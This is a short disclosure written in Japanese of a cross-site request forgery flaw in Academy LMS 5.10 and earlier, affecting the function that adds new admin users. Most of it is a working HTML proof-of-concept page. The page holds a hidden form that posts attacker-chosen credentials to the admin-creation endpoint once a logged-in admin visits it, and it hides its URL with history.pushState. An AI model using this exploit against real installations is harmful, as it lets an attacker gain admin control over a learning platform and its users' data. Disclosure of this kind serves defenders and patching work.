
Academy LMS <= 5.10 の CSRF
Academy LMS <= 5.10 CSRF
Academy LMSは、ユーザーがコースを作成し宣伝できるアプリケーションです。新しい管理ユーザーを追加する機能にはCSRFの脆弱性があり、ソーシャルエンジニアリングを利用してプラットフォームの管理者アクセスを取得することが可能です。
#概念実証 (POC) 概念実証の最初のステップは、管理ユーザーでプラットフォームに認証することです。
その後、脆弱性を悪用するコードを含むページにアクセスするだけで、新しい管理ユーザーがシステムに追加されていることを確認できます。
エクスプロイトで使用したコード:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://target.com/academy/admin/admins/add" method="POST">
<input type="hidden" name="first_name" value="csrf" />
<input type="hidden" name="last_name" value="vinix" />
<input type="hidden" name="biography" value="<p>csrf poc</p>" />
<input type="hidden" name="files" value="" />
<input type="hidden" name="user_image" value="" />
<input type="hidden" name="email" value="username" />
<input type="hidden" name="password" value="password" />
<input type="hidden" name="facebook_link" value="" />
<input type="hidden" name="twitter_link" value="" />
<input type="hidden" name="linkedin_link" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>